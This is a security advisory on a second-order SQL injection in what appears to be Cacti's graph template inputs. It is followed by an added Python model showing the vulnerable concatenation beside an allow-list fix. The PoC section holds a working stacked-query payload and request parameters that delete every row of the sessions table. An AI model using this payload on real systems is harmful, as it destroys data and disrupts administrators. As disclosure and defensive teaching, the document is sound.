Summary
Some of the data stored by the form_save() function in graph_template_inputs.php is not thoroughly checked and is later concatenated into an SQL statement by the draw_nontemplated_fields_graph_item() function in lib/html_form_templates.php, resulting in SQL injection.
Details
In the graph_template_input table, the column_name field is attacker-controllable. The dirty data is written by the form_save() function in graph_template_inputs.php.

Storing the payload does not require administrator privileges; reading it back, which is what triggers the injection, does.
The column_name field is limited to 50 characters (the PoC payload below is exactly 50 characters long).

The attack is triggered from the graph_edit() function in graphs.php, which calls draw_nontemplated_fields_graph_item().

That function, in lib/html_form_templates.php, reads the graph_template_input row from the database and concatenates the stored column_name held in $item directly into the query text without checking it, resulting in SQL injection.


PoC
Send a POST request to graph_template_inputs.php with the following parameters:
- '__csrf_magic'=> '',
- 'action'=>'save',
- 'save_component_input'=>1,
- 'graph_template_input_id'=>1,
- 'graph_template_id'=>1,
- 'name'=>'FORSQLinjection',
- 'description'=>'FORSQLinjection',
- 'column_name'=>'id FROM host AS gti;DELETE FROM sessions WHERE 1;#'
The payload is now stored in the column_name field of the graph_template_input table.

Then, as an administrator, send a GET request to "http://ip:port/graphs.php?action=graph_edit&id=1".
Rendering the edit form for graph id 1 executes the injected statement: the sessions table is emptied, since WHERE 1 matches every row.
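The write-then-read flow above, as an added example that is not part of this advisory or of Cacti's code base: a Python model of both sides, with the vulnerable concatenation beside a hardened form. The table layout, the allow-list of column names and the exact shape of the query on the read side are assumptions; sqlite3.executescript() stands in for a MySQL connection that executes stacked statements, and the trailing MySQL "#" comment is stripped by hand because SQLite does not recognise it.

```python
"""Second-order SQL injection through a stored column name, modelled on
the write-then-read flow in the advisory.  Added example, not Cacti code:
the tables carry only the columns needed here, the query shape on the
read side is assumed, and sqlite3.executescript() stands in for a MySQL
connection that accepts stacked statements."""
import re
import sqlite3

# Payload from the PoC above: exactly 50 characters, so it fits the
# column_name length limit, and "id" is a real column of the item table.
PAYLOAD = "id FROM host AS gti;DELETE FROM sessions WHERE 1;#"

# Assumed allow-list: the item-table columns a template input may name.
ALLOWED_COLUMNS = {"id", "task_item_id", "color_id", "graph_type_id",
                   "cdef_id", "value", "text_format"}


def make_db():
    """Constructed schema: one template item, one host, two sessions."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE graph_template_input (
            id INTEGER PRIMARY KEY, graph_template_id INTEGER,
            name TEXT, description TEXT, column_name TEXT);
        CREATE TABLE graph_templates_item (
            id INTEGER PRIMARY KEY, graph_template_id INTEGER, value TEXT);
        CREATE TABLE host (id INTEGER PRIMARY KEY, hostname TEXT);
        CREATE TABLE sessions (id INTEGER PRIMARY KEY, user_id INTEGER);
        INSERT INTO graph_templates_item VALUES (1, 1, 'cpu');
        INSERT INTO host VALUES (1, 'router');
        INSERT INTO sessions VALUES (1, 1), (2, 2);
    """)
    return db


def form_save_vulnerable(db, column_name):
    """Write side (form_save): the INSERT is parameterised, so the payload
    is stored intact and nothing fails yet.  That is what makes this a
    second-order injection; only the 50-character limit applies."""
    db.execute("INSERT INTO graph_template_input VALUES (?, ?, ?, ?, ?)",
               (1, 1, "FORSQLinjection", "FORSQLinjection", column_name[:50]))


def form_save_hardened(db, column_name):
    """Write side with the missing check: column_name must be a bare
    identifier naming an allowed column, never free-form SQL."""
    if (not re.fullmatch(r"[A-Za-z_][A-Za-z0-9_]*", column_name)
            or column_name not in ALLOWED_COLUMNS):
        raise ValueError(f"column_name is not an allowed column: {column_name!r}")
    form_save_vulnerable(db, column_name)


def draw_item_vulnerable(db, graph_template_id):
    """Read side (draw_nontemplated_fields_graph_item): the stored
    column_name is concatenated into the query text.  Returns the SQL
    that was built so the stacked DELETE is visible."""
    (column_name,) = db.execute(
        "SELECT column_name FROM graph_template_input "
        "WHERE graph_template_id = ?", (graph_template_id,)).fetchone()
    sql = (f"SELECT {column_name} FROM graph_templates_item AS gti "
           f"WHERE gti.graph_template_id = {int(graph_template_id)}")
    # MySQL reads "#" as a line comment and discards the rest of the
    # query; SQLite has no "#" comment, so the tail is dropped by hand.
    db.executescript(sql.split("#", 1)[0])
    return sql


def draw_item_hardened(db, graph_template_id):
    """Read side that trusts nothing from the table: the identifier is
    re-checked against the allow-list before it enters the query."""
    (column_name,) = db.execute(
        "SELECT column_name FROM graph_template_input "
        "WHERE graph_template_id = ?", (graph_template_id,)).fetchone()
    if column_name not in ALLOWED_COLUMNS:
        raise ValueError(f"refusing stored column_name {column_name!r}")
    return db.execute(
        f"SELECT {column_name} FROM graph_templates_item AS gti "
        "WHERE gti.graph_template_id = ?", (graph_template_id,)).fetchone()[0]


def session_count(db):
    return db.execute("SELECT COUNT(*) FROM sessions").fetchone()[0]


def run_vulnerable():
    """Store the payload, then trigger the read: sessions is emptied."""
    db = make_db()
    form_save_vulnerable(db, PAYLOAD)
    sql = draw_item_vulnerable(db, 1)
    return sql, session_count(db)


def run_hardened():
    """The payload is rejected at write time; a legitimate column works."""
    db = make_db()
    rejected = False
    try:
        form_save_hardened(db, PAYLOAD)
    except ValueError:
        rejected = True
    form_save_hardened(db, "value")
    return rejected, draw_item_hardened(db, 1), session_count(db)


if __name__ == "__main__":
    built, left = run_vulnerable()
    print("query built from stored column_name:", built)
    print("sessions left after vulnerable read:", left)
    print("hardened path (rejected, value, sessions left):", run_hardened())
```

The hardened version checks on both sides on purpose: validating at write time closes the hole, and re-checking at read time means a row that was stored before the fix, or written through another path, cannot reach the query either.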
Researcher: ISHGARD-2, USTC